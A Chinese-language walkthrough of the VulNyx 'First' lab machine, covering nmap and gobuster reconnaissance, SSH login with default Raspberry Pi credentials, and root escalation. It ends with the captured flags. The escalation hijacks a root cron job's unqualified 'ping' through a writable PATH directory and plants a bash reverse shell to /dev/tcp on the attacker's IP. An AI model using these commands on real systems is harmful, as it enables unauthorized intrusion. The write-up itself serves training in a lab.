Vlx_First

靶机来源：https://vulnyx.com/

难度：Low

一、信息收集

1、主机探测

┌──(root㉿kali)-[~/miaosec]
└─# nmap -sn 192.168.2.0/24               
Starting Nmap 7.98 ( https://nmap.org ) at 2026-01-29 16:16 +0800
Nmap scan report for 192.168.2.1
Host is up (0.00090s latency).
MAC Address: 0A:00:27:00:00:07 (Unknown)
Nmap scan report for 192.168.2.2
Host is up (0.00072s latency).
MAC Address: 08:00:27:8E:AB:36 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.2.64
Host is up (0.0017s latency).
MAC Address: 08:00:27:BE:88:54 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.2.4
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 7.53 seconds

靶机IP：192.168.2.64

2、端口扫描

1.全端口扫描

┌──(root㉿kali)-[~/miaosec]
└─# nmap --min-rate 10000 -p- 192.168.2.64                        
Starting Nmap 7.98 ( https://nmap.org ) at 2026-01-29 16:16 +0800
Nmap scan report for 192.168.2.64
Host is up (0.00060s latency).
Not shown: 65532 closed tcp ports (reset)
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
4369/tcp open  epmd
MAC Address: 08:00:27:BE:88:54 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 19.09 seconds

开放端口：22、80、4369

2.详细信息扫描

┌──(root㉿kali)-[~/miaosec]
└─# nmap --min-rate 10000 -sT -sC -sV -O -p22,80,4369 192.168.2.64
Starting Nmap 7.98 ( https://nmap.org ) at 2026-01-29 16:17 +0800
Nmap scan report for 192.168.2.64
Host is up (0.00072s latency).

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.4p1 Debian 5+deb11u2 (protocol 2.0)
| ssh-hostkey: 
|   3072 24:83:97:49:96:11:7c:7a:54:00:17:3b:0c:f6:e1:54 (RSA)
|   256 83:cc:d0:72:41:48:fc:c4:ba:46:a1:0e:70:50:52:71 (ECDSA)
|_  256 a0:37:99:32:78:17:69:4f:1d:ac:75:1e:ba:19:58:45 (ED25519)
80/tcp   open  http    Apache httpd 2.4.56 ((Debian))
|_http-title: Apache2 Debian Default Page: It works
|_http-server-header: Apache/2.4.56 (Debian)
4369/tcp open  epmd    Erlang Port Mapper Daemon
| epmd-info: 
|   epmd_port: 4369
|_  nodes: 
MAC Address: 08:00:27:BE:88:54 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|router
Running: Linux 4.X|5.X, MikroTik RouterOS 7.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3
OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3)
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.31 seconds

3.udp扫描

┌──(root㉿kali)-[~/miaosec]
└─# nmap -sU --top-ports 100  192.168.2.64                        
Starting Nmap 7.98 ( https://nmap.org ) at 2026-01-29 16:17 +0800
Nmap scan report for 192.168.2.64
Host is up (0.00076s latency).
Not shown: 97 closed udp ports (port-unreach)
PORT     STATE         SERVICE
68/udp   open|filtered dhcpc
631/udp  open|filtered ipp
5353/udp open|filtered zeroconf
MAC Address: 08:00:27:BE:88:54 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 118.38 seconds

二、WEB渗透

1、HTTP 服务枚举

访问80端口，是Apache的默认页面，无任何信息

2、目录扫描

┌──(root㉿kali)-[~/miaosec]
└─# gobuster dir -u http://192.168.2.64 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x php,txt,html,bak,md,db,js
===============================================================
Gobuster v3.8.2
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.2.64
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.8.2
[+] Extensions:              js,php,txt,html,bak,md,db
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
index.html           (Status: 200) [Size: 10701]
tasklist             (Status: 200) [Size: 137]
server-status        (Status: 403) [Size: 277]
Progress: 1764464 / 1764464 (100.00%)
===============================================================
Finished
===============================================================

找到tasklist

三、获取pi权限

提示Update Raspberry.更新树莓派，搜索树莓派的默认账号和密码

获取到凭证pi:raspberry

成功获取到pi权限

┌──(root㉿kali)-[~/miaosec]
└─# ssh pi@192.168.2.64                   
The authenticity of host '192.168.2.64 (192.168.2.64)' can't be established.
ED25519 key fingerprint is: SHA256:/4sHdLc0MGAL7xya9kIEs8V1Coyl7RG+QaK9LssRo34
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.2.64' (ED25519) to the list of known hosts.
** WARNING: connection is not using a post-quantum key exchange algorithm.
** This session may be vulnerable to "store now, decrypt later" attacks.
** The server may need to be upgraded. See https://openssh.com/pq.html
pi@192.168.2.64's password: 

SSH is enabled and the default password for the 'pi' user has not been changed.
This is a security risk - please login as the 'pi' user and type 'passwd' to set a new password.

pi@raspberry:~ $ id
uid=1000(pi) gid=1000(pi) grupos=1000(pi)

四、权限提升

查看定时任务

pi@raspberry:~ $ cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/var/www/html:/bin:/usr/sbin:/usr/bin

# Example of job definition:
# .---------------- minute (0 - 59)
# |  .------------- hour (0 - 23)
# |  |  .---------- day of month (1 - 31)
# |  |  |  .------- month (1 - 12) OR jan,feb,mar,apr ...
# |  |  |  |  .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# |  |  |  |  |
# *  *  *  *  * user-name command to be executed
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
* * * * * root ping -c1 raspberrypi.com

发现每分钟执行一次ping命令，但由于ping命令未使用绝对路径，且ping的 PATH 环境变量是/usr/bin，在/var/www/html之后，因此可以劫持ping，在/var/www/html里面创建ping命令

pi@raspberry:~ $ which ping
/usr/bin/ping

在/var/www/html里面创建ping命令，由于执行命令无法使用/，因此只能使用反弹shell，无法赋予SUID权限

pi@raspberry:~ $ nano /var/www/html/ping
#!/bin/bash
bash -i >& /dev/tcp/192.168.2.4/4444 0>&1
pi@raspberry:~ $ nano /var/www/html/ping
pi@raspberry:~ $ chmod +x /var/www/html/ping
pi@raspberry:~ $ ls -la /var/www/html
total 28
drwxrwxrwx 2 www-data www-data  4096 ene 29 09:53 .
drwxrwxrwx 3 www-data www-data  4096 nov 11  2023 ..
-rwxrwxrwx 1 www-data www-data 10701 nov 11  2023 index.html
-rwxr-xr-x 1 pi       pi          63 ene 29 09:53 ping
-rwxrwxrwx 1 www-data www-data   137 ene  7  2024 tasklist

等待执行，成功获取到root权限

┌──(root㉿kali)-[~]
└─# nc -nc -lvnp 4444              
listening on [any] 4444 ...
connect to [192.168.2.4] from (UNKNOWN) [192.168.2.64] 33418
bash: no se puede establecer el grupo de proceso de terminal (1798): Función ioctl no apropiada para el dispositivo
bash: no hay control de trabajos en este shell
root@raspberry:~# id
id
uid=0(root) gid=0(root) grupos=0(root)

五、查看FLAG

root@raspberry:~# cat /root/root.txt /home/pi/user.txt
cat /root/root.txt /home/pi/user.txt
a4a7e60b8de265bae9283b46202602e9
09a8a707111af965e56c59c573ac5244